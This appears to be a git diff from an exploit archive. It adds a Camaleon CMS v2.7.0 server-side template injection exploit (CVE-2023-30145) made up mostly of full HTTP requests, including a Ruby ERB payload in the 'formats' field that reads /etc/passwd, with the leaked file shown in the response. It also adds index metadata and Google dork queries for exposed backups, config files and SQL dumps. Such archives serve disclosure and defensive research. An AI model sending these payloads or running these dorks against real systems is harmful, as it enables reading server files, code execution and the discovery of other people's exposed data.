diff --git a/exploits/ruby/webapps/51489.txt b/exploits/ruby/webapps/51489.txt
new file mode 100644
index 000000000..4067ef43f
--- /dev/null
+++ b/exploits/ruby/webapps/51489.txt
@@ -0,0 +1,175 @@
+Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
+Exploit Author: PARAG BAGUL
+CVE: CVE-2023-30145
+
+## Description
+Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template
+Injection (SSTI) vulnerability via the formats parameter.
+
+## Affected Component
+All versions below 2.7.0 are affected.
+
+## Author
+Parag Bagul
+
+## Steps to Reproduce
+1. Open the target URL: `https://target.com/admin/media/upload`
+2. Upload any file and intercept the request.
+3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.
+4. Check the response. It should return the multiplication of 77 with the
+message "File format not allowed (dqopi49vuuvm)".
+
+##Detection:
+
+#Request:
+
+POST /admin/media/upload?actions=false HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target.com/admin/profile/edit
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------327175120238370517612522354688
+Content-Length: 1200
+Origin: http://target.com
+DNT: 1
+Connection: close
+Cookie: cookie
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="file_upload"; filename="test.txt"
+Content-Type: text/plain
+
+test
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="versions"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="thumb_size"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="formats"
+
+test<%= 7*7 %>test
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="media_formats"
+
+image
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="dimension"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="private"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="folder"
+
+/
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="skip_auto_crop"
+
+true
+-----------------------------327175120238370517612522354688--
+
+#Response:
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Connection: close
+Status: 200 OK
+Cache-Control: max-age=0, private, must-revalidate
+Set-Cookie: cookie
+Content-Length: 41
+
+File format not allowed (test49test)
+
+#Exploitation:
+
+To execute a command, add the following payload:
+testqopi<%= File.open('/etc/passwd').read %>fdtest
+
+Request:
+
+POST /admin/media/upload?actions=true HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target.com/admin/media
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------104219633614133026962934729021
+Content-Length: 1237
+Origin: http://target.com
+DNT: 1
+Connection: close
+Cookie: cookie
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="file_upload"; filename="test.txt"
+Content-Type: text/plain
+
+test
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="versions"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="thumb_size"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="formats"
+
+dqopi<%= File.open('/etc/passwd').read %>fdfdsf
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="media_formats"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="dimension"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="private"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="folder"
+
+/
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="skip_auto_crop"
+
+true
+-----------------------------104219633614133026962934729021--
+
+Response:
+
+Response:
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Connection: close
+Status: 200 OK
+Set-Cookie: cookie
+Content-Length: 1816
+
+File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+fdfdsf)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e5e225116..89520951c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14879,7 +14879,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
-51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31698,,,,,
+51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-26,1,CVE-2023-31698,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -19000,7 +19000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",2021-04-16,boku,webapps,php,,2021-04-16,2021-10-29,0,,,,,,
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
-51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-23,0,CVE-2022-41544,,,,,
+51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-26,1,CVE-2022-41544,,,,,
4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@@ -29517,7 +29517,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php,,2011-06-23,2015-01-23,1,,,,,,https://www.securityfocus.com/bid/48399/info
35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,,2011-06-21,2015-01-23,1,OSVDB-73201,,,,,https://www.securityfocus.com/bid/48355/info
48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
-51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
+51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-26,1,,,,,,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,,2018-05-29,2018-05-29,0,CVE-2018-11535,,,,,
25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
@@ -34520,6 +34520,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
+51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-05-26,0,CVE-2023-30145,,,,,
51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
diff --git a/ghdb.xml b/ghdb.xml
index e2e99f7f4..b69e51bce 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -40746,6 +40746,21 @@ Information about user data is obtained
2022-06-20
Suman Das
+
+ 8188
+ https://www.exploit-db.com/ghdb/8188
+ Files Containing Juicy Info
+ intitle:"index of "main.yml"
+ # Google Dork: intitle:"index of "main.yml"
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: muhammetadibas
+ Files Containing Juicy Info
+ https://www.google.com/search?q=Files Containing Juicy Info
+
+ 2023-05-26
+ muhammetadibas
+
8175
https://www.exploit-db.com/ghdb/8175
@@ -46387,6 +46402,21 @@ htdocs present in the respective url.
2022-06-16
Ract Hack
+
+ 8191
+ https://www.exploit-db.com/ghdb/8191
+ Files Containing Juicy Info
+ intitle:"index of" github-api
+ # Google Dork: intitle:"index of" github-api
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Midhya Mathew
+ intitle:"index of" github-api
+ https://www.google.com/search?q=intitle:"index of" github-api
+
+ 2023-05-26
+ Midhya Mathew
+
7854
https://www.exploit-db.com/ghdb/7854
@@ -46403,6 +46433,22 @@ htdocs present in the respective url.
2022-06-15
Muhammad Al-Amin
+
+ 8192
+ https://www.exploit-db.com/ghdb/8192
+ Files Containing Juicy Info
+ intitle:"index of" google-maps-api
+ # Google Dork: intitle:"index of" google-maps-api
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Midhya Mathew
+
+ intitle:"index of" google-maps-api
+ https://www.google.com/search?q=intitle:"index of" google-maps-api
+
+ 2023-05-26
+ Midhya Mathew
+
7672
https://www.exploit-db.com/ghdb/7672
@@ -46682,6 +46728,21 @@ Category: Files containing Juicy Info
2019-09-16
The Dexter
+
+ 8193
+ https://www.exploit-db.com/ghdb/8193
+ Files Containing Juicy Info
+ intitle:"Index of" inurl:/backup/ "admin.zip"
+ # Google Dork: intitle:"Index of" inurl:/backup/ "admin.zip"
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Midhya Mathew
+ intitle:"Index of" inurl:/backup/ "admin.zip"
+ https://www.google.com/search?q=intitle:"Index of" inurl:/backup/ "admin.zip"
+
+ 2023-05-26
+ Midhya Mathew
+
8101
https://www.exploit-db.com/ghdb/8101
@@ -47739,6 +47800,21 @@ Sachin
2020-07-07
Sachin Kattimani
+
+ 8190
+ https://www.exploit-db.com/ghdb/8190
+ Files Containing Juicy Info
+ intitle:"Sharing API Info"
+ # Google Dork: intitle:"Sharing API Info"
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: dmr
+ intitle:"Sharing API Info"
+ https://www.google.com/search?q=intitle:"Sharing API Info"
+
+ 2023-05-26
+ dmr
+
4268
https://www.exploit-db.com/ghdb/4268
@@ -50377,6 +50453,21 @@ attachments
2013-09-24
anonymous
+
+ 8194
+ https://www.exploit-db.com/ghdb/8194
+ Files Containing Juicy Info
+ inurl:*/wp-content/plugins/contact-form-7/
+ # Google Dork: inurl:*/wp-content/plugins/contact-form-7/
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Bappe Sarker
+ inurl:*/wp-content/plugins/contact-form-7/
+ https://www.google.com/search?q=inurl:*/wp-content/plugins/contact-form-7/
+
+ 2023-05-26
+ Bappe Sarker
+
399
https://www.exploit-db.com/ghdb/399
@@ -53336,6 +53427,21 @@ Mufeed VH
2018-08-06
Mufeed VH
+
+ 8189
+ https://www.exploit-db.com/ghdb/8189
+ Files Containing Juicy Info
+ inurl:uploadimage.php
+ # Google Dork: inurl:uploadimage.php
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: muhammetadibas
+ Vulnerable Files
+ https://www.google.com/search?q=Vulnerable Files
+
+ 2023-05-26
+ muhammetadibas
+
8185
https://www.exploit-db.com/ghdb/8185
@@ -54062,6 +54168,21 @@ https://ch.linkedin.com/in/schmidbruno
2005-09-08
anonymous
+
+ 8195
+ https://www.exploit-db.com/ghdb/8195
+ Files Containing Juicy Info
+ Re: "index of /backup.sql
+ # Google Dork: index of /backup.sql
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Ramjan Ali Sabber
+ Re: "index of /backup.sql
+ https://www.google.com/search?q=Re: "index of /backup.sql
+
+ 2023-05-26
+ Ramjan Ali Sabber
+
7966
https://www.exploit-db.com/ghdb/7966
@@ -54107,6 +54228,21 @@ https://ch.linkedin.com/in/schmidbruno
2023-04-28
Mohd S
+
+ 8196
+ https://www.exploit-db.com/ghdb/8196
+ Files Containing Juicy Info
+ Re: intitle:index.of conf.php
+ # Google Dork: intitle:index.of conf.php
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Ramjan Ali Sabber
+ Re: intitle:index.of conf.php
+ https://www.google.com/search?q=Re: intitle:index.of conf.php
+
+ 2023-05-26
+ Ramjan Ali Sabber
+
31
https://www.exploit-db.com/ghdb/31